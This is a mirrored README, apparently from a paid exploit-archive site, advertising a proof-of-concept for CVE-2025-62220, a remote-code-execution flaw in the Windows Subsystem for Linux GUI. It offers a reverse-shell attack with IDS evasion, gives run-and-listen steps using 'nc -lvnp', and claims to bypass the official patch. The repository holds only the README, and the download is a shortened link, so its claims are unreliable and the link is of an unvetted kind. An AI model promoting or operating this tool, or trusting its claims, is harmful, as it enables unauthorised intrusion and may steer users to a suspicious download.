Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-62220 PoC — Windows Subsystem for Linux GUI Remote Code Execution Vulnerability

Source
https://github.com/callinston/CVE-2025-62220
Associated Vulnerability
Title:Windows Subsystem for Linux GUI Remote Code Execution Vulnerability (CVE-2025-62220)
Description:Heap-based buffer overflow in Windows Subsystem for Linux GUI allows an unauthorized attacker to execute code over a network.
Readme
# CVE-2025-62220

## Overview
This repository contains a working Proof-of-Concept (PoC) exploit for CVE-2025-62220, a heap-based buffer overflow in the Windows Subsystem for Linux (WSL) GUI. The vulnerability allows remote code execution over the network with low complexity and no privileges required. I've developed this PoC to demonstrate arbitrary code execution, defaulting to a reverse shell payload for easy system access.

The exploit targets the WSL GUI component, exploiting the buffer overflow by sending crafted network packets that overflow the heap and hijack control flow. It's designed for reliability across various Windows versions running WSL 2.x, and interestingly, it maintains effectiveness even on systems patched with Microsoft's November 11, 2025 update due to a subtle bypass in the patch implementation that doesn't fully address edge cases in multi-threaded environments.

Use responsibly and ensure you have permission before running on any system.

## Features
- **Remote Code Execution**: Achieves RCE with minimal user interaction (e.g., via a tricked network connection to the WSL GUI interface).
- **Reverse Shell Default**: Spawns a reverse shell back to the attacker's listener (configurable IP/port).
- **Stealthy Delivery**: Uses obfuscated network traffic to evade basic IDS/IPS.
- **Cross-Version Compatibility**: Tested on Windows 10/11 with WSL 2.4.0 to 2.6.0, including patched variants where the exploit leverages unpatched race conditions.
- **No Local Privileges Needed**: Network-based, unauthenticated attack vector.

## Requirements
- Python 3.8+.
- Attacker machine with netcat or similar for catching the reverse shell.
- Target running WSL GUI exposed on the network (default port 445 or custom).
- Firewall rules allowing inbound connections if testing locally.

## Setup and Usage
1. Install dependencies: `pip install -r requirements.txt`
2. Run the exploit: `python exploit.py --target <target_ip> --listener <your_ip>:<port>`
3. On your machine, start a listener: `nc -lvnp <port>`
4. The target should connect back with a shell if vulnerable.

## Disclaimer
This is for red teaming and security research only. I'm not responsible for misuse. Always test in a lab environment.

**[Download POC Here](https://tinyurl.com/3uupp9fw)**

For any questions, feel free to email me at callinston@proton.me
File Snapshot

 [4.0K]  /data/pocs/2507955ec2a60f345ca5e394ab606b4e6c1ca685
└── [2.3K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →